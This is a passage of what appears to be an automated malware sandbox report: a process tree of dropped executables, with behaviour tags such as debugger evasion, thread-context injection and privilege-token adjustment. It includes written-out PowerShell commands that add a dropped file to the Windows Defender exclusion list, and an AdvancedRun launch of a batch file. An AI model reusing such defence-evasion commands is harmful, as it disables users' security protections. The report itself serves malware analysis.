C:\Users\Admin\Documents\sOyXqXENHJ2NeF5SGRuq1HDW.exe"C:\Users\Admin\Documents\sOyXqXENHJ2NeF5SGRuq1HDW.exe"2⤵
- Executes dropped EXE
PID:792
-
-
C:\Users\Admin\Documents\OrtvqXJXXZ53o_eOhODIyXyC.exe"C:\Users\Admin\Documents\OrtvqXJXXZ53o_eOhODIyXyC.exe"2⤵
- Executes dropped EXE
PID:4816 -
C:\Users\Admin\Documents\OrtvqXJXXZ53o_eOhODIyXyC.exe"C:\Users\Admin\Documents\OrtvqXJXXZ53o_eOhODIyXyC.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4732
-
-
-
C:\Users\Admin\Documents\lqtegPSCqaQL0BkETsnNX2J5.exe"C:\Users\Admin\Documents\lqtegPSCqaQL0BkETsnNX2J5.exe"2⤵
- Executes dropped EXE
PID:4636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1608
-
-
-
C:\Users\Admin\Documents\Y8LE_a6emvYyv9d67QKtEh5h.exe"C:\Users\Admin\Documents\Y8LE_a6emvYyv9d67QKtEh5h.exe"2⤵
- Executes dropped EXE
PID:4300
-
-
C:\Users\Admin\Documents\ISrB_dvDm1IkVUo_XGeYeA5p.exe"C:\Users\Admin\Documents\ISrB_dvDm1IkVUo_XGeYeA5p.exe"2⤵
- Executes dropped EXE
PID:5024
-
-
C:\Users\Admin\Documents\xazowB24hxO2_b9ZeaYd6yML.exe"C:\Users\Admin\Documents\xazowB24hxO2_b9ZeaYd6yML.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4632
-
-
C:\Users\Admin\Documents\gBaUMdeBsiBdikEiNiY5NoXS.exe"C:\Users\Admin\Documents\gBaUMdeBsiBdikEiNiY5NoXS.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\123ae933-3e73-49d7-8410-4e5fa71b2ff4\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\123ae933-3e73-49d7-8410-4e5fa71b2ff4\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\123ae933-3e73-49d7-8410-4e5fa71b2ff4\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:1056
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\123ae933-3e73-49d7-8410-4e5fa71b2ff4\test.bat"4⤵PID:5180
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\gBaUMdeBsiBdikEiNiY5NoXS.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\gBaUMdeBsiBdikEiNiY5NoXS.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe3⤵PID:5912
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe3⤵PID:2228
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe3⤵PID:6108
-
-
-
C:\Users\Admin\Documents\o9bhD_cFtB6ZOF1w10k76AMZ.exe"C:\Users\Admin\Documents\o9bhD_cFtB6ZOF1w10k76AMZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe"C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:820 -
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:704
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:5152
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:5884
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:5572
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:4904
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:4084
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:4796
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:5296
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:5084
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:2196 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 284⤵
- Program crash
PID:7108
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6360
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7004
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6432
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6808
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:1460
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6196
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4960
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:1632
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
PID:4816
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4636
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6280
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5256
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:7108
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2080
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3132
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3164
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2184
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5260
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1540
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:1596
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5932
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6332
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4540
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7332
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7692
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8016
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7212
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7980
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2204
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7892
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7232
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5936
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6692
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7068
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:524
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5968
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5960
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
PID:5128
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8116
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7100
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7924
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4300
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5124
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5524
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2200
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2040
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7544
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3068
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8176
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4804
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3068
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3300
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7488
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2272
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7196
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6436
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1644⤵
- Program crash
PID:6412
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6896
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3324
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7392
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6200
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6172
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8224
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8512
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8672
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9164
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8480
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9116
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8256
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3352
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9100
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4536
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5032
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8856
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7084
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8528
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9300
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9488
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9692
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9908
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10188
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:1304
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2128
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8764
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9652
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 284⤵
- Program crash
PID:9384
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:408
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6292
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10020
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9360
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9660
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10220
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8348
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8408
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9756
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9976
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:1556
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3632
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10096
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9852
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:1388
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8868
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:512
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8876
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2324
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8968
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4712
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9904
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 1644⤵
- Program crash
PID:8944
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8816
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4192
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2624
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10104
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9880
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9784
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9348
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2636
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9568
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9672
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2156
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9920 -s 284⤵
- Program crash
PID:6476
-
-
-
